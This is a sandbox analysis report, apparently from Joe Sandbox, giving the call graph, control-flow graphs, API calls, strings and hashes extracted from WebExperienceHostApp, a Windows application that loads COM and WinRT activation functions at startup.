30502 7ff60bd73534 30323->30502 30326 7ff60bd72a02 30326->30236 30326->30239 30327 7ff60bd754f4 30326->30327 30328 7ff60bd7550f 30327->30328 30329 7ff60bd7555a 30328->30329 30330 7ff60bd75530 _CxxThrowException 30328->30330 30331 7ff60bd7557e 30329->30331 30332 7ff60bd7301c 19 API calls 30329->30332 30330->30329 30333 7ff60bd755a2 30331->30333 30335 7ff60bd7301c 19 API calls 30331->30335 30334 7ff60bd7556d _CxxThrowException 30332->30334 30336 7ff60bd755c6 30333->30336 30337 7ff60bd7301c 19 API calls 30333->30337 30334->30331 30339 7ff60bd75591 _CxxThrowException 30335->30339 30338 7ff60bd755ea 30336->30338 30341 7ff60bd7301c 19 API calls 30336->30341 30340 7ff60bd755b5 _CxxThrowException 30337->30340 30342 7ff60bd7560e 30338->30342 30344 7ff60bd7301c 19 API calls 30338->30344 30339->30333 30340->30336 30343 7ff60bd755d9 _CxxThrowException 30341->30343 30345 7ff60bd75632 30342->30345 30347 7ff60bd7301c 19 API calls 30342->30347 30343->30338 30346 7ff60bd755fd _CxxThrowException 30344->30346 30348 7ff60bd75656 30345->30348 30349 7ff60bd7301c 19 API calls 30345->30349 30346->30342 30350 7ff60bd75621 _CxxThrowException 30347->30350 30352 7ff60bd7301c 19 API calls 30348->30352 30353 7ff60bd7567a 30348->30353 30351 7ff60bd75645 _CxxThrowException 30349->30351 30350->30345 30351->30348 30355 7ff60bd75669 _CxxThrowException 30352->30355 30354 7ff60bd7569e 30353->30354 30356 7ff60bd7301c 19 API calls 30353->30356 30357 7ff60bd756c2 30354->30357 30359 7ff60bd7301c 19 API calls 30354->30359 30355->30353 30358 7ff60bd7568d _CxxThrowException 30356->30358 30360 7ff60bd756e6 30357->30360 30361 7ff60bd7301c 19 API calls 30357->30361 30358->30354 30363 7ff60bd756b1 _CxxThrowException 30359->30363 30362 7ff60bd7570a 30360->30362 30365 7ff60bd7301c 19 API calls 30360->30365 30364 7ff60bd756d5 _CxxThrowException 30361->30364 30366 7ff60bd7572e 30362->30366 30368 7ff60bd7301c 19 API calls 30362->30368 30363->30357 30364->30360 30367 7ff60bd756f9 _CxxThrowException 30365->30367 30515 7ff60bd7301c GetErrorInfo 30366->30515 30367->30362 30370 7ff60bd7571d _CxxThrowException 30368->30370 30370->30366 30371 7ff60bd75735 _CxxThrowException 30372->30256 30373->30295 30374->30261 30375->30271 30376->30284 30377->30275 30378->30285 30379->30253 30380->30268 30381->30277 30382->30267 30383->30274 30384->30278 30385->30289 30386->30292 30389 7ff60bd75058 30388->30389 30390 7ff60bd75054 30388->30390 30541 7ff60bd75204 __std_exception_copy _CxxThrowException GetProcessHeap HeapAlloc _CxxThrowException 30389->30541 30395 7ff60bd74ff8 abort GetProcessHeap HeapFree 30390->30395 30392 7ff60bd7505f 30542 7ff60bd75c80 _errno _invalid_parameter_noinfo memset _errno _invalid_parameter_noinfo 30392->30542 30394 7ff60bd75077 30394->30390 30395->30300 30396->30302 30397->30304 30398->30306 30399->30236 30400->30235 30401->30263 30402->30283 30403->30272 30404->30280 30406 7ff60bd7503c 10 API calls 30405->30406 30407 7ff60bd73297 30406->30407 30407->30227 30409 7ff60bd738f7 30408->30409 30410 7ff60bd73970 30408->30410 30420 7ff60bd737d4 ReleaseSRWLockExclusive AcquireSRWLockExclusive 30409->30420 30410->30314 30412 7ff60bd738fc 30412->30410 30421 7ff60bd74c04 12 API calls 30412->30421 30415 7ff60bd749d9 30414->30415 30416 7ff60bd749e3 30414->30416 30417 7ff60bd738c4 13 API calls 30415->30417 30422 7ff60bd74a94 30416->30422 30417->30416 30419 7ff60bd74a34 30419->30316 30420->30412 30421->30410 30423 7ff60bd74ac1 30422->30423 30426 7ff60bd7480c 30423->30426 30425 7ff60bd74aed 30425->30419 30428 7ff60bd74839 30426->30428 30427 7ff60bd7486a 30430 7ff60bd7489a AcquireSRWLockExclusive 30427->30430 30433 7ff60bd748ed 30427->30433 30428->30427 30434 7ff60bd746cc 19 API calls 30428->30434 30431 7ff60bd748be 30430->30431 30435 7ff60bd7338c ReleaseSRWLockExclusive 30431->30435 30433->30425 30434->30427 30435->30433 30437 7ff60bd729ab 30436->30437 30438 7ff60bd7298e 30436->30438 30442 7ff60bd7251c 30437->30442 30458 7ff60bd73598 30438->30458 30441 7ff60bd729a0 30441->30321 30463 7ff60bd73238 30442->30463 30446 7ff60bd72588 30447 7ff60bd72673 30446->30447 30448 7ff60bd72593 30446->30448 30450 7ff60bd754f4 34 API calls 30447->30450 30449 7ff60bd7262f 30448->30449 30453 7ff60bd725cd 30448->30453 30451 7ff60bd73598 34 API calls 30449->30451 30452 7ff60bd72678 30450->30452 30454 7ff60bd72624 30451->30454 30455 7ff60bd725fa InterlockedPushEntrySList 30453->30455 30456 7ff60bd72612 30453->30456 30454->30441 30455->30456 30457 7ff60bd73598 34 API calls 30456->30457 30457->30454 30459 7ff60bd735d6 30458->30459 30460 7ff60bd735da 30459->30460 30461 7ff60bd754f4 34 API calls 30459->30461 30460->30441 30462 7ff60bd735ff 30461->30462 30464 7ff60bd7256b 30463->30464 30465 7ff60bd73248 30463->30465 30467 7ff60bd72aa0 30464->30467 30465->30464 30466 7ff60bd73252 abort 30465->30466 30466->30464 30468 7ff60bd72af3 30467->30468 30480 7ff60bd72add 30467->30480 30469 7ff60bd72b2f 30468->30469 30470 7ff60bd72aff LoadLibraryW GetProcAddress 30468->30470 30471 7ff60bd72b47 LoadLibraryW GetProcAddress 30469->30471 30474 7ff60bd72b94 30469->30474 30470->30469 30472 7ff60bd72b67 30471->30472 30473 7ff60bd72b72 30471->30473 30472->30480 30473->30474 30474->30480 30488 7ff60bd74f40 10 API calls 30474->30488 30476 7ff60bd72d36 30492 7ff60bd73310 free _invalid_parameter_noinfo_noreturn 30476->30492 30479 7ff60bd72be4 30479->30476 30486 7ff60bd72c50 30479->30486 30489 7ff60bd75478 11 API calls 30479->30489 30480->30446 30481 7ff60bd72c93 LoadLibraryW 30491 7ff60bd75478 11 API calls 30481->30491 30484 7ff60bd72cc3 GetProcAddress 30485 7ff60bd72d15 FreeLibrary 30484->30485 30484->30486 30485->30479 30486->30479 30486->30481 30486->30484 30486->30485 30487 7ff60bd72d22 30486->30487 30490 7ff60bd72224 14 API calls 30486->30490 30487->30476 30488->30479 30489->30479 30490->30481 30491->30486 30492->30480 30494 7ff60bd73238 abort 30493->30494 30495 7ff60bd72809 30494->30495 30507 7ff60bd72a38 30495->30507 30497 7ff60bd72816 30498 7ff60bd728a5 30497->30498 30499 7ff60bd7287a InterlockedPushEntrySList 30497->30499 30500 7ff60bd72892 30497->30500 30498->30326 30499->30500 30512 7ff60bd71b50 30500->30512 30503 7ff60bd7356c 30502->30503 30504 7ff60bd73570 30503->30504 30505 7ff60bd754f4 34 API calls 30503->30505 30504->30326 30506 7ff60bd73595 30505->30506 30508 7ff60bd72aa0 25 API calls 30507->30508 30509 7ff60bd72a71 30508->30509 30510 7ff60bd72a7e 30509->30510 30511 7ff60bd754f4 34 API calls 30509->30511 30510->30497 30511->30510 30513 7ff60bd73534 34 API calls 30512->30513 30514 7ff60bd71b64 30513->30514 30514->30498 30517 7ff60bd73079 30515->30517 30516 7ff60bd730e8 30518 7ff60bd730fa SysFreeString 30516->30518 30527 7ff60bd73102 30516->30527 30517->30516 30522 7ff60bd73166 30517->30522 30518->30527 30519 7ff60bd7316f 30539 7ff60bd75108 GetProcAddress GetErrorInfo 30519->30539 30521 7ff60bd731e9 30540 7ff60bd74ff8 abort GetProcessHeap HeapFree 30521->30540 30522->30519 30535 7ff60bd75748 11 API calls 30522->30535 30524 7ff60bd731f2 30525 7ff60bd731fb SysFreeString 30524->30525 30524->30527 30525->30527 30527->30371 30528 7ff60bd731ae 30529 7ff60bd731b7 30528->30529 30534 7ff60bd731cf 30528->30534 30536 7ff60bd74ff8 abort GetProcessHeap HeapFree 30529->30536 30532 7ff60bd731c6 30537 7ff60bd74ff8 abort GetProcessHeap HeapFree 30532->30537 30538 7ff60bd74ff8 abort GetProcessHeap HeapFree 30534->30538 30535->30528 30536->30532 30537->30534 30538->30519 30539->30521 30540->30524 30541->30392 30542->30394 30543 7ffe002810a0 30546 7ffe00283ab0 30543->30546 30545 7ffe002810c0 shared_ptr 30547 7ffe00283acb 30546->30547 30550 7ffe00288370 30547->30550 30549 7ffe00283b2a 30549->30545 30562 7ffe00286610 30550->30562 30555 7ffe002883bb 30556 7ffe002883c8 30555->30556 30573 7ffe0028ae30 _lock_locales _unlock_locales tidy_global 30555->30573 30556->30549 30558 7ffe002883d8 std::ios_base::Init::_Init_dtor 30574 7ffe002846bc 13 API calls std::ios_base::failure::failure 30558->30574 30560 7ffe00288418 _CxxThrowException 30561 7ffe00288432 30560->30561 30561->30549 30575 7ffe00286bd0 30562->30575 30564 7ffe00286650 30585 7ffe002d2b1c 30564->30585 30567 7ffe00286669 30569 7ffe00289260 30567->30569 30570 7ffe00289289 30569->30570 30599 7ffe00283930 30570->30599 30573->30556 30574->30560 30576 7ffe00286be1 30575->30576 30577 7ffe00286be7 std::ios_base::Init::_Init_dtor 30575->30577 30576->30564 30595 7ffe002846bc 13 API calls std::ios_base::failure::failure 30577->30595 30579 7ffe00286c29 _CxxThrowException 30580 7ffe00286c40 30579->30580 30580->30564 30581 7ffe00286c5e _CxxThrowException 30580->30581 30582 7ffe00286c68 std::ios_base::Init::_Init_dtor 30580->30582 30581->30582 30596 7ffe002846bc 13 API calls std::ios_base::failure::failure 30582->30596 30584 7ffe00286caa _CxxThrowException 30586 7ffe002d2b36 malloc 30585->30586 30587 7ffe0028665a 30586->30587 30588 7ffe002d2b27 30586->30588 30587->30567 30594 7ffe00291fd0 10 API calls 4 library calls 30587->30594 30588->30586 30589 7ffe002d2b46 30588->30589 30590 7ffe002d2b51 30589->30590 30597 7ffe002bb660 _CxxThrowException Concurrency::cancel_current_task 30589->30597 30598 7ffe00286868 _CxxThrowException std::bad_alloc::bad_alloc 30590->30598 30594->30567 30595->30579 30596->30584 30618 7ffe002b8040 30599->30618 30601 7ffe0028394a 30602 7ffe002b8040 tidy_global _lock_locales 30601->30602 30607 7ffe00283999 30601->30607 30603 7ffe0028396f 30602->30603 30632 7ffe002b80e0 _unlock_locales 30603->30632 30604 7ffe002839e6 30634 7ffe002b80e0 _unlock_locales 30604->30634 30606 7ffe00283a31 30606->30555 30606->30558 30607->30604 30621 7ffe00285eb0 30607->30621 30611 7ffe00283a3f 30635 7ffe00286888 _CxxThrowException free free std::bad_alloc::bad_alloc 30611->30635 30612 7ffe002839fe 30633 7ffe00291f88 _CxxThrowException _CxxThrowException malloc stdext::threads::_Mtx_new 30612->30633 30619 7ffe002b8057 30618->30619 30620 7ffe002b804f _lock_locales 30618->30620 30619->30601 30620->30619 30622 7ffe00285edf 30621->30622 30623 7ffe002839f8 30621->30623 30622->30623 30624 7ffe002d2b1c stdext::threads::_Mtx_new 3 API calls 30622->30624 30623->30611 30623->30612 30626 7ffe00285ef0 30624->30626 30625 7ffe00285f57 30625->30623 30646 7ffe00284bf0 7 API calls 30625->30646 30626->30625 30636 7ffe00284340 30626->30636 30632->30607 30633->30604 30634->30606 30637 7ffe002b8040 tidy_global _lock_locales 30636->30637 30638 7ffe0028435c 30637->30638 30639 7ffe00284390 30638->30639 30640 7ffe002843aa 30638->30640 30647 7ffe00292100 setlocale 30639->30647 30652 7ffe002bb790 __std_exception_copy _CxxThrowException 30640->30652 30644 7ffe002843b6 30653 7ffe00284d10 30647->30653 30650 7ffe00292147 30651 7ffe00292139 setlocale 30651->30650 30652->30644 30654 7ffe00284d75 30653->30654 30655 7ffe00284d2d 30653->30655 30654->30650 30654->30651 30656 7ffe00284d32 free 30655->30656 30657 7ffe00284d38 30655->30657 30656->30657 30657->30654 30658 7ffe00284d51 malloc 30657->30658 30658->30654 30659 7ffe00284d66 memcpy 30658->30659 30659->30654 30660 7ff60bd78ca4 30661 7ff60bd78cdc __GSHandlerCheckCommon 30660->30661 30662 7ff60bd78d08 30661->30662 30663 7ff60bd78cf7 __CxxFrameHandler4 30661->30663 30663->30662 30664 7ffe13306430 30665 7ffe1330646c RtlPcToFileHeader 30664->30665 30666 7ffe1330644f 30664->30666 30667 7ffe13306484 30665->30667 30668 7ffe13306493 RaiseException 30665->30668 30666->30665 30667->30668

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 59 7ff60bd72aa0-7ff60bd72adb 60 7ff60bd72add-7ff60bd72aee 59->60 61 7ff60bd72af3-7ff60bd72afd 59->61 66 7ff60bd72d5b-7ff60bd72d7a call 7ff60bd711a0 60->66 62 7ff60bd72b2f-7ff60bd72b35 61->62 63 7ff60bd72aff-7ff60bd72b28 LoadLibraryW GetProcAddress 61->63 65 7ff60bd72b3e-7ff60bd72b45 62->65 63->62 67 7ff60bd72b47-7ff60bd72b65 LoadLibraryW GetProcAddress 65->67 68 7ff60bd72b94-7ff60bd72b96 65->68 70 7ff60bd72b67-7ff60bd72b6d 67->70 71 7ff60bd72b72-7ff60bd72b92 67->71 72 7ff60bd72b98-7ff60bd72b9b 68->72 73 7ff60bd72ba0-7ff60bd72bc5 call 7ff60bd71b0e 68->73 70->66 71->68 72->66 78 7ff60bd72bc7-7ff60bd72bcf 73->78 79 7ff60bd72bd1-7ff60bd72bd8 73->79 81 7ff60bd72bdb-7ff60bd72bdf call 7ff60bd74f40 78->81 79->81 83 7ff60bd72be4-7ff60bd72bf9 81->83 84 7ff60bd72d36-7ff60bd72d41 call 7ff60bd71b1a 83->84 85 7ff60bd72bff-7ff60bd72c0d 83->85 91 7ff60bd72d43-7ff60bd72d50 call 7ff60bd73310 84->91 87 7ff60bd72c11-7ff60bd72c15 85->87 89 7ff60bd72c26-7ff60bd72c30 87->89 90 7ff60bd72c17-7ff60bd72c1a 87->90 89->84 93 7ff60bd72c36-7ff60bd72c4e call 7ff60bd75478 89->93 90->84 92 7ff60bd72c20-7ff60bd72c24 90->92 91->66 98 7ff60bd72d52-7ff60bd72d56 call 7ff60bd757b0 91->98 92->87 99 7ff60bd72c7c-7ff60bd72c8e call 7ff60bd72224 93->99 100 7ff60bd72c50-7ff60bd72c7a 93->100 98->66 102 7ff60bd72c93-7ff60bd72cbd LoadLibraryW call 7ff60bd75478 99->102 100->102 102->83 106 7ff60bd72cc3-7ff60bd72cd5 GetProcAddress 102->106 107 7ff60bd72cd7-7ff60bd72cea 106->107 108 7ff60bd72d15-7ff60bd72d1d FreeLibrary 106->108 110 7ff60bd72cec-7ff60bd72d04 107->110 111 7ff60bd72d06-7ff60bd72d0a 107->111 108->83 110->111 115 7ff60bd72d22-7ff60bd72d29 110->115 111->108 112 7ff60bd72d0c-7ff60bd72d10 call 7ff60bd757b0 111->112 112->108 115->91 116 7ff60bd72d2b-7ff60bd72d34 call 7ff60bd757b0 115->116 116->91
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                    • API String ID: 2574300362-4036682018
                                                                    • Opcode ID: 47d738070b0af0edd47e385eed6e46aaa3c203f272d590f42774a49a749df1a6
                                                                    • Instruction ID: 1f1936b232f40b22a7bb68f95e268d86d54e0945ebed8fcd3beca10f79147970
                                                                    • Opcode Fuzzy Hash: 47d738070b0af0edd47e385eed6e46aaa3c203f272d590f42774a49a749df1a6
                                                                    • Instruction Fuzzy Hash: 67814F61B44A4284FB18DF61D8411EDA7A0AF49B98F648239DE1FD66F8FFBCE4458300

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 7ff60bd754f4-7ff60bd7550d 1 7ff60bd75524-7ff60bd7552e 0->1 2 7ff60bd7550f-7ff60bd7551c 0->2 3 7ff60bd7555a-7ff60bd75560 1->3 4 7ff60bd75530-7ff60bd75559 _CxxThrowException 1->4 2->1 5 7ff60bd75562-7ff60bd7557d call 7ff60bd7301c _CxxThrowException 3->5 6 7ff60bd7557e-7ff60bd75584 3->6 4->3 5->6 8 7ff60bd75586-7ff60bd755a1 call 7ff60bd7301c _CxxThrowException 6->8 9 7ff60bd755a2-7ff60bd755a8 6->9 8->9 12 7ff60bd755aa-7ff60bd755c5 call 7ff60bd7301c _CxxThrowException 9->12 13 7ff60bd755c6-7ff60bd755cc 9->13 12->13 15 7ff60bd755ea-7ff60bd755f0 13->15 16 7ff60bd755ce-7ff60bd755e9 call 7ff60bd7301c _CxxThrowException 13->16 20 7ff60bd755f2-7ff60bd7560d call 7ff60bd7301c _CxxThrowException 15->20 21 7ff60bd7560e-7ff60bd75614 15->21 16->15 20->21 24 7ff60bd75616-7ff60bd75631 call 7ff60bd7301c _CxxThrowException 21->24 25 7ff60bd75632-7ff60bd75638 21->25 24->25 28 7ff60bd7563a-7ff60bd75655 call 7ff60bd7301c _CxxThrowException 25->28 29 7ff60bd75656-7ff60bd7565c 25->29 28->29 31 7ff60bd7567a-7ff60bd75680 29->31 32 7ff60bd7565e-7ff60bd75679 call 7ff60bd7301c _CxxThrowException 29->32 36 7ff60bd75682-7ff60bd7569d call 7ff60bd7301c _CxxThrowException 31->36 37 7ff60bd7569e-7ff60bd756a4 31->37 32->31 36->37 40 7ff60bd756a6-7ff60bd756c1 call 7ff60bd7301c _CxxThrowException 37->40 41 7ff60bd756c2-7ff60bd756c8 37->41 40->41 44 7ff60bd756ca-7ff60bd756e5 call 7ff60bd7301c _CxxThrowException 41->44 45 7ff60bd756e6-7ff60bd756ec 41->45 44->45 47 7ff60bd7570a-7ff60bd75710 45->47 48 7ff60bd756ee-7ff60bd75709 call 7ff60bd7301c _CxxThrowException 45->48 52 7ff60bd75712-7ff60bd7572d call 7ff60bd7301c _CxxThrowException 47->52 53 7ff60bd7572e-7ff60bd75747 call 7ff60bd7301c _CxxThrowException 47->53 48->47 52->53
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrow$ErrorFreeInfoString
                                                                    • String ID: bad allocation
                                                                    • API String ID: 1975901121-2104205924
                                                                    • Opcode ID: 0933e274a7c38970862a05a2fb4c41735afd250a0c49872c24e88f4e3a59b920
                                                                    • Instruction ID: a88a76f63258dce196d7ca3f8fd6e8df6629f3741d2af258f3d53a54934e8d1c
                                                                    • Opcode Fuzzy Hash: 0933e274a7c38970862a05a2fb4c41735afd250a0c49872c24e88f4e3a59b920
                                                                    • Instruction Fuzzy Hash: 4561D921EA850795EB08EB60E8811FDA361EF5C318FB0D735D50ED64F9BEACE5468384

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 119 7ff60bd75d10-7ff60bd75d63 call 7ff60bd73278 * 2 call 7ff60bd74ea0 126 7ff60bd75d69-7ff60bd75d8e call 7ff60bd72dac call 7ff60bd729c8 119->126 127 7ff60bd760d0-7ff60bd76118 call 7ff60bd72d7c call 7ff60bd72900 119->127 135 7ff60bd75d93-7ff60bd75d9c 126->135 141 7ff60bd7611a-7ff60bd76121 call 7ff60bd754f4 127->141 142 7ff60bd76122-7ff60bd76127 127->142 136 7ff60bd760ac-7ff60bd760af 135->136 137 7ff60bd75da2-7ff60bd75dc1 135->137 139 7ff60bd760bc-7ff60bd760c4 136->139 140 7ff60bd760b1-7ff60bd760bb call 7ff60bd757b0 136->140 150 7ff60bd75dca-7ff60bd75dd0 137->150 151 7ff60bd75dc3-7ff60bd75dc5 call 7ff60bd754f4 137->151 139->127 152 7ff60bd760c6-7ff60bd760cb call 7ff60bd757b0 139->152 140->139 141->142 147 7ff60bd76129-7ff60bd7613b 142->147 148 7ff60bd76145-7ff60bd7615a LoadLibraryExW 142->148 156 7ff60bd7618f-7ff60bd761af call 7ff60bd757b0 call 7ff60bd74ff8 * 2 147->156 173 7ff60bd7613d-7ff60bd76144 call 7ff60bd754f4 147->173 155 7ff60bd7615c-7ff60bd76172 GetProcAddress 148->155 148->156 153 7ff60bd75ee6-7ff60bd75f0d call 7ff60bd724a4 call 7ff60bd7373c 150->153 154 7ff60bd75dd6-7ff60bd75dd9 150->154 151->150 152->127 192 7ff60bd75f2e-7ff60bd75f3f call 7ff60bd74ff8 153->192 193 7ff60bd75f0f-7ff60bd75f29 call 7ff60bd74ff8 * 2 153->193 160 7ff60bd75dec-7ff60bd75e1e call 7ff60bd7242c call 7ff60bd7373c call 7ff60bd734c4 154->160 161 7ff60bd75ddb-7ff60bd75de1 154->161 155->156 162 7ff60bd76174-7ff60bd76183 RoInitialize 155->162 211 7ff60bd761b1-7ff60bd761d1 call 7ff60bd711a0 156->211 218 7ff60bd75e2b-7ff60bd75e31 160->218 219 7ff60bd75e20-7ff60bd75e2a call 7ff60bd757b0 160->219 166 7ff60bd75de3-7ff60bd75de6 161->166 167 7ff60bd75e41-7ff60bd75e68 call 7ff60bd724a4 call 7ff60bd7373c 161->167 169 7ff60bd761d4-7ff60bd761f6 call 7ff60bd757b0 call 7ff60bd74ff8 * 2 162->169 170 7ff60bd76185-7ff60bd7618e 162->170 166->160 176 7ff60bd75f83-7ff60bd75f99 call 7ff60bd73db8 166->176 206 7ff60bd75e6a-7ff60bd75e84 call 7ff60bd74ff8 * 2 167->206 207 7ff60bd75e89-7ff60bd75e9a call 7ff60bd74ff8 167->207 169->211 170->156 173->148 197 7ff60bd75f9b-7ff60bd75f9f 176->197 198 7ff60bd75fa1 176->198 212 7ff60bd75f4b-7ff60bd75f4e 192->212 213 7ff60bd75f41-7ff60bd75f46 call 7ff60bd757b0 192->213 193->192 205 7ff60bd75fa8-7ff60bd75fcc 197->205 198->205 214 7ff60bd75fd3-7ff60bd75fdc 205->214 206->207 234 7ff60bd75e9c-7ff60bd75ea1 call 7ff60bd757b0 207->234 235 7ff60bd75ea6-7ff60bd75ea9 207->235 212->176 225 7ff60bd75f50-7ff60bd75f77 call 7ff60bd72dac call 7ff60bd734c4 212->225 213->212 214->214 224 7ff60bd75fde-7ff60bd76030 call 7ff60bd74f40 call 7ff60bd74ff8 _wcslwr_s 214->224 218->176 229 7ff60bd75e37-7ff60bd75e3c 218->229 219->218 251 7ff60bd7603d-7ff60bd760a7 call 7ff60bd7503c call 7ff60bd74ff8 * 3 call 7ff60bd73310 call 7ff60bd74ff8 224->251 252 7ff60bd76032-7ff60bd76038 call 7ff60bd74e38 224->252 225->176 253 7ff60bd75f79 225->253 237 7ff60bd75f7e call 7ff60bd757b0 229->237 234->235 235->176 243 7ff60bd75eaf-7ff60bd75ed6 call 7ff60bd72dac call 7ff60bd734c4 235->243 237->176 243->176 257 7ff60bd75edc-7ff60bd75ee1 243->257 251->136 252->251 253->237 257->237
                                                                    APIs
                                                                    • _wcslwr_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF60BD7601B
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD75554
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD75578
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD7559C
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD755C0
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD755E4
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD75608
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD7562C
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD75650
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD75674
                                                                      • Part of subcall function 00007FF60BD754F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF60BD75698
                                                                      • Part of subcall function 00007FF60BD74FF8: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF60BD731F2,?,?,?,?,?,?,?,?,?,00007FF60BD75735), ref: 00007FF60BD7501A
                                                                      • Part of subcall function 00007FF60BD74FF8: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF60BD731F2,?,?,?,?,?,?,?,?,?,00007FF60BD75735), ref: 00007FF60BD75027
                                                                    • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF60BD76151
                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF60BD76166
                                                                    • RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF60BD76179
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrow$Heap$AddressFreeInitializeLibraryLoadProcProcess_wcslwr_s
                                                                    • String ID: StartApplication$WebExperienceHost.dll$getstarted$ms-cxh://getstarted/?surface=start
                                                                    • API String ID: 708943818-2938634902
                                                                    • Opcode ID: e8c37fcd8af3848a00225ce46d0b1f18bbe59973078c324ef50a8d7345a33e00
                                                                    • Instruction ID: dcfc401a15be2e5fcf376b712011a91f6c63b726d94d4c75f8c01b91866b461a
                                                                    • Opcode Fuzzy Hash: e8c37fcd8af3848a00225ce46d0b1f18bbe59973078c324ef50a8d7345a33e00
                                                                    • Instruction Fuzzy Hash: D8D1332265D98692EA289B14E4503FEE361FF98744F649231E68FC26F5FFACE504C740

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_wide_winmain_command_line_register_thread_local_exe_atexit_callback
                                                                    • String ID:
                                                                    • API String ID: 3863933208-0
                                                                    • Opcode ID: 334a747d7520e6ee41ddac6c63d8f888343b0ad2c4d77d698ff4bb8d04e6e29e
                                                                    • Instruction ID: c47cd12e72bc650ac22b440d684dde4c1bfe4fa2a95a6d95ded57496f389533b
                                                                    • Opcode Fuzzy Hash: 334a747d7520e6ee41ddac6c63d8f888343b0ad2c4d77d698ff4bb8d04e6e29e
                                                                    • Instruction Fuzzy Hash: 2B311920A8814342EA1CAB6494523FDA391AF4D348F78C735D94FEB6F3FEACA5458214

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
